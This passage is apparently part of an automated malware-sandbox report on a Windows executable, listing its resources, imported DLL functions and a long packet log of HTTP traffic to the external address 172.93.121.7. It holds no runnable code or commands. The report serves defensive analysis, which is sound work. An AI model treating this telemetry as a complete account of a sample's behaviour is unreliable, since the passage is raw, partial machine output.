                              RT_ICON0xbb7f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.2626641651031895
                              RT_ICON0xbc8980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.305327868852459
                              RT_ICON0xbd2200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3608156028368794
                              RT_DIALOG0xbd6880x100dataEnglishUnited States0.5234375
                              RT_DIALOG0xbd7880x11cdataEnglishUnited States0.6091549295774648
                              RT_DIALOG0xbd8a80x60dataEnglishUnited States0.7291666666666666
                              RT_GROUP_ICON0xbd9080x76dataEnglishUnited States0.7203389830508474
                              RT_VERSION0xbd9800x1e4dataEnglishUnited States0.512396694214876
                              RT_MANIFEST0xbdb680x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                              DLLImport
                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TimestampSource PortDest PortSource IPDest IP
                              May 22, 2024 20:31:38.749021053 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:38.955976963 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:38.956182003 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:38.956564903 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.163436890 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.164582968 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.164630890 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.164743900 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.164908886 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.166707039 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.166754961 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.167052984 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.168845892 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.168894053 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.169130087 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.169262886 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.170985937 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.171036005 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.171225071 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.173146963 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.173197031 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.173373938 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.173373938 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.371903896 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.371952057 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.371974945 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.372076035 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.372112989 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.372134924 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.372359991 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.374114037 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.374226093 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.374335051 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.374397993 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.376269102 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.376388073 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.376512051 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.376589060 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.378413916 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.378488064 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.378678083 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.380562067 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.380675077 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.380836964 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.380911112 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.387412071 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.387439966 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.387623072 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.389549971 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.389662981 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.389847994 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.389868975 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.392904043 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.392991066 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.393076897 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.393237114 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.395081997 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.395195961 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.395265102 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.395381927 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.579178095 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.579219103 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.579245090 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.579385042 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.579452991 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.579483032 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.579608917 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.582335949 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.582367897 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.582653046 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.584382057 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.584424019 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.584734917 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.586503029 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.586546898 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.586831093 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.588727951 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.588759899 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.588922024 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.589071989 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.590886116 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.590918064 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.591296911 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.593007088 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.593049049 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.593272924 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.595138073 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.595180988 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.595397949 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.597299099 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.597338915 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.597538948 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.597568989 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.599458933 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.599499941 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.599776983 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.601656914 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.601700068 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.601917028 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.603816986 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.603863001 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.604116917 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.605983973 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.606015921 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.606197119 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.608068943 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.608100891 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.608222961 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.608329058 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.610392094 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.610424042 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.610682964 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.612380981 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.612413883 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.612695932 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.614530087 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.614561081 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.614751101 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.616946936 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.616978884 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.617218018 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.619093895 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.619143963 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.619353056 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.786384106 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.786454916 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.786508083 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.786581039 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.786611080 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.786623955 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.786726952 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.786835909 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.788507938 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.788599968 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.788732052 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.789041996 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.790719986 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.790741920 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.790990114 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.792934895 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.793042898 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.793332100 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.795039892 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.795152903 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.795232058 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.795319080 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.797172070 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.797329903 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.797514915 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.797514915 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.799350023 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.799451113 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.799652100 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.801462889 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.801574945 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.801645041 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.801862001 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.803620100 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.803760052 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.803813934 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.804069042 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.805809021 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.805824041 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.806081057 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.807957888 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.807972908 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.808309078 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.810054064 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.810162067 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.810318947 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.810333014 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.812242985 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.812350988 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.812475920 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.812546968 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.814373970 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.814513922 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.814600945 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.814718008 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.816550970 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.816657066 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.816747904 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.816992998 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.818694115 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.818794966 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.818880081 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.819009066 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.820893049 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.820908070 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.821206093 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.822984934 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.823098898 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.823194027 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.823286057 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.825232983 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.825248957 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.825529099 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.827368021 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.827383041 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.827604055 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.829549074 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.829564095 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.829839945 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.831674099 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.831784964 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.832036018 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.833806038 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.833916903 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.833997011 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.834106922 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.835968018 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.836039066 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.836126089 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.836241007 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.838052034 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.838093042 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.838243961 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.840250015 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.840265989 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.840487957 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.842375040 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.842488050 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.842554092 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.842780113 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.844491959 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.844532967 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.844686031 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.846752882 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.846862078 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.846978903 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.847063065 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.848845005 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.848956108 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.849066973 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.849144936 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.850960016 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.851094007 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.851119041 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.851342916 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.853133917 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.853306055 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.853477955 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.853477955 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.855349064 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.855364084 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.855499983 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.855642080 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.857484102 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.857498884 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.857749939 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.859668970 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.859683990 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.859905958 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.861846924 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.861958981 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.862019062 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.862143993 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.866331100 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.866345882 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.866628885 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.873281002 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.873296022 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.873543978 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.880366087 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.880381107 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.880630016 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.993592024 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.993613958 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.993626118 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.993788958 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.993797064 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.993885040 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.993957996 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.995759964 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.995867968 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.996052980 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.996052980 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:39.997960091 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.997975111 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:39.998306036 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.000134945 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.000149965 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.000361919 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.002342939 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.002357960 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.002573967 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.004410982 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.004508972 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.004771948 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.006633043 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.006747007 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.006942034 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.006942034 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.008785963 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.008800983 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.009128094 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.011018038 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.011033058 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.011260033 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.013055086 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.013166904 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.013257980 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.013350964 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.015181065 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.015288115 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.015415907 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.015490055 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.017353058 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.017452002 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.017600060 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.017690897 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.019546032 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.019642115 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.019809961 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.019885063 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.026360035 CEST8049794172.93.121.7192.168.11.20
